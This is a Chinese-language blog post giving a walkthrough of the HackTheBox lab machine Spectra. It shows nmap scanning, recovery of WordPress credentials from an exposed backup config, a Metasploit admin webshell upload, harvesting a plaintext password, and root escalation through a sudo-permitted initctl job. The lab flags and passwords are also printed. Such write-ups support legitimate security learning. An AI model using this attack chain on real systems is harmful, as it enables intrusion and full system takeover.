【渗透测试】hackthebox靶场之Spectra

  • A+
所属分类:安全文章
【渗透测试】hackthebox靶场之Spectra

【渗透测试】hackthebox靶场之Spectra



【渗透测试】hackthebox靶场之Spectra


渗透测试:

0x01信息收集

【渗透测试】hackthebox靶场之Spectra

端口扫描:

nmap -A -sS -sV -sC 10.10.10.229


【渗透测试】hackthebox靶场之Spectra

发现开放80,22,3306端口,使用浏览器访问80端口web服务

0x02 目录遍历

【渗透测试】hackthebox靶场之Spectra

有一个页面包含两个超链接(翻译:在IT设置Jira之前,我们可以配置并使用它进行问题跟踪。)点击两个链接,发现都访问不了,我猜可能跟上一题一样,要把IP地址解析到域名上去:

echo "10.10.10.229 spectra.htb" >> /etc/hosts


【渗透测试】hackthebox靶场之Spectra

然后访问链接后发现是个wordpress的默认模板页面,点来点去并没有发现什么东西

【渗透测试】hackthebox靶场之Spectra

点来点去也没有什么明显的东西,点击第二个页面

【渗透测试】hackthebox靶场之Spectra

显示数据库没有连接,然后浏览目录的时候发现列出来了一些文件

【渗透测试】hackthebox靶场之Spectra

看到wp-config.php.save文件,看起来是配置文件,我们下载下来试试:

wget http://spectra.htb/testing/wp-config.php.save


【渗透测试】hackthebox靶场之Spectra

然后看到一些数据库连接配置

【渗透测试】hackthebox靶场之Spectra

尝试使用数据库的用户名和密码登录wp的后台

【渗透测试】hackthebox靶场之Spectra

发现报Unknown username错误,我们尝试用Administrator这个用户名和密码devteam01登录下,发现成功登录

【渗透测试】hackthebox靶场之Spectra

然后我们可以通过msf生成一个webshell,适用于wp的模板shell,通过更换模板方式去把webshell传上去

【渗透测试】hackthebox靶场之Spectra

use exploit/unix/webapp/wp_admin_shell_upload //使用此expset rhosts 10.10.10.229 //设置目标主机set lhost 10.10.14.4 //设置本机IP地址set username administrator //设置登录用户名set password devteam01//设置登录密码set targeturi /mainexploit


【渗透测试】hackthebox靶场之Spectra

然后获得msf会话,然后getshell,并且升级shell

【渗透测试】hackthebox靶场之Spectra

使用cat /etc/passwd查看有哪些用户,发现有个katie用户

【渗透测试】hackthebox靶场之Spectra

然后查看home目录下的文件,发现有个katie文件夹

【渗透测试】hackthebox靶场之Spectra

ls -al /home/katie


【渗透测试】hackthebox靶场之Spectra

发现/home/katie目录下有个user.txt,cat之后发现受到nginx用户的限制,我们必须切换成katie用户才能查看。先找到katie用户的密码,首先我们看的第一个地方是/opt目录:

【渗透测试】hackthebox靶场之Spectra

看到一个autologin.conf.orig文件很可疑,cat一下看看。

【渗透测试】hackthebox靶场之Spectra

这是一个脚本文件,通过脚本可知,一直是指向/etc/autologin目录,发现这个目录下有个passwd文件,我们可以看到密码:SummerHereWeCome!!

【渗透测试】hackthebox靶场之Spectra

我猜是某个登录密码,一开始不是扫描到了SSH的22端口,可以试下是不是SSH的密码。

【渗透测试】hackthebox靶场之Spectra

连接成功!根目录下找到user flag:

e89d27fe195e9114ffa72ba8913a6130



0x03 提升权限

使用sudo -l查看当前能使用root特权的文件。发现/sbin/initctl文件不需要密码也可以执行,但是我不清楚这个文件是做什么的

【渗透测试】hackthebox靶场之Spectra

google查了一下,initctl是作为系统来控制启动和停止的过程,看起来可以执行根shell的好方法。首先我们看看/etc/init

【渗透测试】hackthebox靶场之Spectra

发现目录下有好多个文件。看起来text.conf系列的文件比较可疑。查看一下

【渗透测试】hackthebox靶场之Spectra

看起来katie用户比较忙,我们可以通过自己的代码替换内容,以便可以用root权限运行

sudo initctl list | grep test //显示test中的会话作业


【渗透测试】hackthebox靶场之Spectra

可以看到test是停止状态,使用vim编辑,提权至sudo执行bin/bash

【渗透测试】hackthebox靶场之Spectra

保存后重新使用initctl命令开启test并且执行/bin/bash

sudo /sbin/initctl start test/bin/bash -p


【渗透测试】hackthebox靶场之Spectra

成功获得root shell,在/root/root.txt获得root flag:

d44519713b889d5e1f9e536d0c6df2fc






【渗透测试】hackthebox靶场之Spectra


【渗透测试】hackthebox靶场之Spectra

【渗透测试】hackthebox靶场之Spectra

【渗透测试】hackthebox靶场之ScriptKiddie

【渗透测试】hackthebox靶场之Delivery

【渗透测试】hackthebox靶场之Base

【渗透测试】Hackthebox之Beginner Track系列


【渗透测试】hackthebox靶场之Spectra
【渗透测试】hackthebox靶场之Spectra
微信搜一搜
【渗透测试】hackthebox靶场之Spectra
暗魂攻防实验室


本文始发于微信公众号(暗魂攻防实验室):【渗透测试】hackthebox靶场之Spectra

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: